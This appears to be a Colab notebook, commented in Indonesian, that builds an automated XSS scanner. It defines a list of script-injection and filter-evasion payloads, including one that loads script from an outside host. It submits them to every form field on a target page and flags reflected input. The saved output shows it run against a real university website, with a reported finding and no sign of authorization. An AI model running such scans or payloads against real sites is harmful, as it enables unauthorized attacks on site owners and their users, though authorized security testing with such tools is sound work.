<a href="https://colab.research.google.com/github/kotaksuusu/kreasi/blob/main/XSS_Scanner_Hanif.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
!pip install requests beautifulsoup4

In [1]:
import requests
from bs4 import BeautifulSoup

# Daftar payload XSS lengkap
payloads = [
    # Basic script tags
    "<script>alert(1)</script>",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",

    # HTML attribute injections
    "\"><script>alert(1)</script>",
    "'><script>alert(1)</script>",
    "';alert(1);//",
    "\" onmouseover=\"alert(1)",
    "<body onload=alert(1)>",

    # Event handler attacks
    "<img src=x onerror=alert(1)>",
    "<iframe src='javascript:alert(1)'></iframe>",
    "<svg/onload=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<video><source onerror='alert(1)'></video>",
    "<input onfocus=alert(1) autofocus>",

    # JavaScript pseudo-scheme
    "javascript:alert(1)",

    # Bypass with variations & filter evasion
    "<scr<script>ipt>alert(1)</scr<script>ipt>",
    "<scri<script>pt>alert(1)</scri<script>pt>",
    "<svg><desc><![CDATA[><script>alert(1)</script>]]></desc></svg>",
    "<math><mtext><title><img src=x onerror=alert(1)></title></mtext></math>",

    # Encoded payloads
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",

    # Null byte trick
    "<script\x00>alert(1)</script>",

    # Style-based
    "<div style=\"background-image:url(javascript:alert(1))\">",

    # Object tag
    "<object data='javascript:alert(1)'></object>",
]

def scan_forms_xss(url):
    print(f"[+] Mengakses: {url}")
    try:
        response = requests.get(url, timeout=10)
        soup = BeautifulSoup(response.text, 'html.parser')
        forms = soup.find_all('form')

        if not forms:
            print("[-] Tidak ada form ditemukan.")
            return

        print(f"[+] Ditemukan {len(forms)} form. Mulai scanning...\n")

        for i, form in enumerate(forms):
            action = form.get('action')
            method = form.get('method', 'get').lower()
            inputs = form.find_all(['input', 'textarea', 'select'])
            data = {}

            for inp in inputs:
                name = inp.get('name')
                if name:
                    data[name] = "XSS_TEST"

            for payload in payloads:
                test_data = {k: payload for k in data}
                target_url = url if not action or action in ['#', ''] else action
                full_url = target_url if target_url.startswith('http') else requests.compat.urljoin(url, target_url)

                if method == "post":
                    res = requests.post(full_url, data=test_data)
                else:
                    res = requests.get(full_url, params=test_data)

                if payload in res.text:
                    print(f"[!!] POTENSI XSS TERDETEKSI!")
                    print(f"     Form ke-{i+1}")
                    print(f"     Method  : {method.upper()}")
                    print(f"     Payload : {payload}")
                    print(f"     URL     : {full_url}\n")
                    break  # Stop jika payload pertama langsung masuk

        print("[+] Selesai scanning form.\n")

    except Exception as e:
        print(f"[ERROR] Gagal akses URL: {str(e)}")


In [9]:
scan_forms_xss("https://web.polines.ac.id/")

[+] Mengakses: https://web.polines.ac.id/
[+] Ditemukan 1 form. Mulai scanning...

[!!] POTENSI XSS TERDETEKSI!
     Form ke-1
     Method  : GET
     Payload : javascript:alert(1)
     URL     : https://web.polines.ac.id/en_us/

[+] Selesai scanning form.

